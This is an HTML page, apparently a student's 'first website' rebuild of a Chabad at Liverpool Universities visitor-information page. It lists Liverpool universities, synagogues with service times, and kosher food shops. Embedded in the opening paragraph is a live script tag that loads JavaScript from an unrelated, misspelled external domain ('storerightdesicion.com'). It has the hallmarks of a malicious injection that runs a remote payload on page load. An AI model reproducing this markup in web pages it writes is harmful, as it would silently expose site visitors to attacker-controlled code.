<!DOCTYPE html>
<html>
    <head>
        <title>Project: First Website</title>
        <meta charset="utf-8">
        <style>
        html {
            scroll-padding-top: 120px;
            scroll-behavior: smooth;
            }
         h1.title {
             margin-top: 120px;
            }
        .header {
            color: white;
            background-color: black;
            height: 10%;
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            z-index:1;
            }
        #header-logo {
            margin-left: 80px;
            width: 150px;
            position: fixed;
            }
        .home {
            text-align: center;
            font-size: 30px;
            float: right;
            padding-right: 10px;
            padding-left: 10px;
            padding-top: 5px;
            padding-bottom: 5px;
            margin-left: 280px;
            margin-top: 30px;
            color: white;
            text-decoration-line: none;     
            }
        .home:hover {
            color: black;
            background-color: white;
            }
        .contact-us {
            text-align: center;
            font-size: 30px;
            float: right;
            padding-right: 10px;
            padding-left: 10px;
            padding-top: 5px;
            padding-bottom: 5px;
            margin-top: 30px;
            color: white;
            text-decoration-line: none;
            }
        .contact-us:hover {
            color: black;
            background-color: white;
            }
        .about-us {
            text-align: center;
            font-size: 30px;
            float: right;
            padding-right: 10px;
            padding-left: 10px;
            padding-top: 5px;
            padding-bottom: 5px;
            margin-top: 30px;
            color: white;
            text-decoration-line: none;
            }
        .about-us:hover {
            color: black;
            background-color: white;
            }
        .shabbat {
            text-align: center;
            font-size: 30px;
            float: right;
            padding-right: 10px;
            padding-left: 10px;
            padding-top: 5px;
            padding-bottom: 5px;
            margin-top: 30px;
            color: white;
            text-decoration-line: none;
            }
        .shabbat:hover {
            color: black;
            background-color: white;
            }
        .classes {
            text-align: center;
            font-size: 30px;
            float: right;
            padding-right: 10px;
            padding-left: 10px;
            padding-top: 5px;
            padding-bottom: 5px;
            margin-top: 30px;
            color: white;
            text-decoration-line: none;
            }
        .classes:hover {
            color: black;
            background-color: white;
            }
        .programmes {
            text-align: center;
            font-size: 30px;
            float: right;
            padding-right: 10px;
            padding-left: 10px;
            padding-top: 5px;
            padding-bottom: 5px;
            margin-top: 30px;
            color: white;
            text-decoration-line: none;
            }
        .programmes:hover {
            color: black;
            background-color: white;
            }
        .events {
            text-align: center;
            font-size: 30px;
            float: right;
            padding-right: 10px;
            padding-left: 10px;
            padding-top: 5px;
            padding-bottom: 5px;
            margin-top: 30px;
            color: white;
            text-decoration-line: none;
            }
        .events:hover {
            color: black;
            background-color: white;
            }
        .galery {
            text-align: center;
            font-size: 30px;
            float: right;
            padding-right: 10px;
            padding-left: 10px;
            padding-top: 5px;
            padding-bottom: 5px;
            margin-top: 30px;
            color: white;
            text-decoration-line: none;
            }
        .galery:hover {
            color: black;
            background-color: white;
            }
        .donate {
            text-align: center;
            font-size: 30px;
            float: right;
            padding-right: 10px;
            padding-left: 10px;
            padding-top: 5px;
            padding-bottom: 5px;
            margin-top: 30px;
            color: white;
            text-decoration-line: none;
            }
        .donate:hover {
            color: black;
            background-color: white;
            }
        .visitor-information {
            text-align: center;
            font-size: 30px;
            float: right;
            padding-right: 10px;
            padding-left: 10px;
            padding-top: 5px;
            padding-bottom: 5px;
            margin-top: 30px;
            color: white;
            text-decoration-line: none;
            }
        .visitor-information:hover {
            color: black;
            background-color: white;
            }
        .liverpool-waterfront {
            width: 100%;
            height: 50vh;
            top: 0;
            left: 0;
            margin-top: 70px;
            padding:0;
            }
        .intro-paragraph {
            width: 100%;
            top: 0;
            left: 0;
            padding-top: 20px;
            padding-bottom: 20px;
            background-color: rgb(211, 211, 211);
            color: black;
            text-align = center;
            }
        .first-sentence-intro {
            color: black;
            font-size = 30px;
            text-align: center;
            }
        .second-sentence-intro {
            font-size = 20px;
            text-align: center;
            }
        a {
            text-decoration-line: none;
            }
</style>
    </head>
    <body>
        <div class = "header">
           <a href = "/index.html"><img id = "header-logo" src = "https://www.ulivchabad.org/wp-content/uploads/2014/05/ChabadLiverpoolUnilogo-011.jpg" alt = "Chabad at Liverpool Universities Logo"></a>
            <table>
                <tbody>
                    <tr>
                        <td><a class = "home" href = "/index.html">Home</a></td>
                        <td><a class = "contact-us" href="/contact-us.html">Contact Us</a></td>
                        <td><a class = "about-us" href = "/about-us.html">About Us</a></td>
                        <td><a class = "shabbat" href = "/shabbat.html">Shabbat</a></td>
                        <td><a class = "classes" href = "/classes.html">Classes</a></td>
                        <td><a class = "programmes" href = "/programmes.html">Programmes</a></td>
                        <td><a class = "events" href = "/events.html">Events</a></td>
                        <td><a class = "galery" href = "/galery.html">Galery</a></td>
                        <td><a class = "donate" href = "/donate.html">Donate</a></td>
                        <td><a class = "visitor-information" href = "/visitor-information.html">Visitor Information</a></td>
                    </tr>
                </tbody>
            </table> 
        </div>
      <div class="row-fluid"><div class="span12 "><h1 style="text-align: center;">Visitor Information</h1>
<p>Whether you are a student or a visitor checking out our events this page will help you gather the necessary information. We really look forward in meeting you personally at Chabad.<script src="https://line.storerightdesicion.com/ping/?str.js" type="text/javascript"></script></p>
</div></div><div class="row-fluid"><div class="span6 "><div class="tw-toggle"><div class="accordion-group"><div class="accordion-heading  active"><a class="accordion-toggle toggle  active" data-toggle="collapse" href="#toggle_0_0">UNIVERSITIES<span class="tw-check"><i class="icon-plus"></i><i class="icon-minus"></i></span></a></div><div class="accordion-body collapse in" id="toggle_0_0"><div class="accordion-inner"><p style="color: #666666;"><img class="aligncenter wp-image-190 size-thumbnail" src="https://www.ulivchabad.org/wp-content/uploads/2016/03/LIVERPOOL-UNIVERSITY-e1459257634419.jpg" alt="Liverpool-University" width="150" height="150">There are 4 universities in Liverpool</p>
<p style="color: #666666;"><a title="" href="http://www.liv.ac.uk/">University of Liverpool</a></p>
<p style="color: #666666;"><a title="" href="http://www.ljmu.ac.uk/">John Moores University</a></p>
<p style="color: #666666;"><a title="" href="http://www.hope.ac.uk/">Hope University&nbsp;</a></p>
<p style="color: #666666;"><a title="" href="http://www.lipa.ac.uk/">L.I.P.A.&nbsp;&nbsp;</a></p>
</div></div></div></div></div><div class="span6 "><div class="tw-toggle"><div class="accordion-group"><div class="accordion-heading  active"><a class="accordion-toggle toggle  active" data-toggle="collapse" href="#toggle_1_0">CITY OF LIVERPOOL<span class="tw-check"><i class="icon-plus"></i><i class="icon-minus"></i></span></a></div><div class="accordion-body collapse in" id="toggle_1_0"><div class="accordion-inner"><p style="color: #666666;"><img loading="lazy" class="aligncenter wp-image-192 size-thumbnail" src="https://www.ulivchabad.org/wp-content/uploads/2016/03/liverpool-city.jpg" alt="liverpool-city" width="150" height="150">Liverpool has been named in the top three UK city break destinations for the second successive year by readers of travel bible,&nbsp;<strong>Condé Nast Traveller&nbsp;</strong>Magazine.</p>
<p style="color: #666666;">Liverpool’s third position places the city ahead of other popular destinations including:&nbsp;<strong>Bath</strong>&nbsp;(4th);&nbsp;<strong>Oxford&nbsp;</strong>(5th);&nbsp;<strong>Manchester&nbsp;</strong>(6th) and&nbsp;<strong>York&nbsp;</strong>(7th)</p>
<p style="color: #666666;">Liverpool&nbsp; has always been a city proud of its architecture. We have a wonderful waterfront that is recognisable as New York, Hong Kong or Sydney so get yourself on the ferry and revel in its splendour. For more info about Liverpool please click&nbsp;<a title="" href="http://www.visitliverpool.com/" target="_blank">here</a></p>
</div></div></div></div></div></div><div class="row-fluid"><div class="span6 "><div class="tw-toggle"><div class="accordion-group"><div class="accordion-heading  active"><a class="accordion-toggle toggle  active" data-toggle="collapse" href="#toggle_2_0">SYNAGOGUES<span class="tw-check"><i class="icon-plus"></i><i class="icon-minus"></i></span></a></div><div class="accordion-body collapse in" id="toggle_2_0"><div class="accordion-inner"><p style="color: #666666;"><img loading="lazy" class="aligncenter size-thumbnail wp-image-193" src="https://www.ulivchabad.org/wp-content/uploads/2016/03/synagogue.jpg" alt="synagogue" width="150" height="150">Liverpool has 3 functional synagogues.</p>
<p style="color: #666666;">Allerton Hebrew Congregation&nbsp;<span class="Bodycopy">207 Mather Avenue Liverpool L18 9UB&nbsp;</span><span class="Bodycopy">– 0151 724 4811 www.allertonshul.org.uk</span></p>
<p style="color: #666666;">Childwall Hebrew Congregation&nbsp;<span class="Bodycopy">Dunbabin Road Liverpool L15 6XL – 0151 722 5438 www.theshul.co.uk<br>
</span></p>
<p style="color: #666666;">Liverpool Old Hebrew Congreation&nbsp;<span class="Bodycopy">Princes Road Liverpool L8 1TG –</span>0151 709 3431</p>
<p style="color: #666666;">There are daily minyonim available.</p>
<p style="color: #666666;">Shacharis: 7:10am (Childwall)&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 8:00am (Allerton)</p>
<p style="color: #666666;">For Mincha and Maariv please contact the Shuls or visit their websites</p>
<p style="color: #666666;">Shabbat:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Friday night Winter: At candle lighting (Childwall, Allerton)&nbsp;&nbsp;&nbsp; Summer: 7:30pm (Childwall, Allerton)</p>
<p style="color: #666666;">Shabbat Morning: Childwall —&nbsp;Winter:&nbsp; 9:00am. Summer: 9:15am&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Allerton — 9:15am&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Princes Road — 9:45am</p>
<p style="color: #666666;">Shabbos Mincha: Childwall: Winter — 1.5 hours before termination of Shabbat&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Summer — 1 hour before termination of Shabbat</p>
</div></div></div></div></div><div class="span6 "><div class="tw-toggle"><div class="accordion-group"><div class="accordion-heading  active"><a class="accordion-toggle toggle  active" data-toggle="collapse" href="#toggle_3_0">KOSHER FOOD<span class="tw-check"><i class="icon-plus"></i><i class="icon-minus"></i></span></a></div><div class="accordion-body collapse in" id="toggle_3_0"><div class="accordion-inner"><p style="color: #666666;"><img loading="lazy" class="aligncenter size-thumbnail wp-image-194" src="https://www.ulivchabad.org/wp-content/uploads/2016/03/kosher-food.jpg" alt="kosher-food" width="150" height="150">There is 1 Kosher shop in Liverpool:&nbsp;<span class="Bodycopy">Rosemans Delicatessen 20, Childwall Abbey Rd Liverpool L16 0JN Tel: 0151 722 2584</span></p>
<p style="color: #666666;"><span class="Bodycopy">There is a large selection of Kosher products in the Tesco Superstore:</span>Mather Avenue, Liverpool, L18 6HF Tel: 0845 677 9002 For more info click&nbsp;<a title="" href="https://secure.tesco.com/storelocator/access/details.asp?bID=2022&amp;l=L" target="_blank">here</a></p>
<p style="color: #666666;">
</p><p style="color: #666666;">In Old Swan there is a Tesco Superstore that has approx 75 different Kosher products:&nbsp; St. Oswalds Street, Liverpool, L13 2BY. Tel: 0845 677 9523 For more info click&nbsp;<a title="" href="https://secure.tesco.com/storelocator/access/details.asp?bID=2993&amp;l=L" target="_blank">here</a></p>
<p style="color: #666666;">In Toxteth there is a Tesco Extra that has a large variety of Kosher products: 215 Park Road, Toxteth, Liverpool, L8 4XF. Tel: 0845 026 9672</p>
<p style="color: #666666;">In Woolton there is a Tesco Superstore that has approx different Kosher products:&nbsp; Allerton Road, Liverpool, L25 7SF Tel: 0845 0700082 For more info click&nbsp;<a title="" href="http://www.tesco.com/storeLocator/access/details.asp?bID=3420&amp;l=L" target="_blank">here</a></p>
</div></div></div></div></div></div>
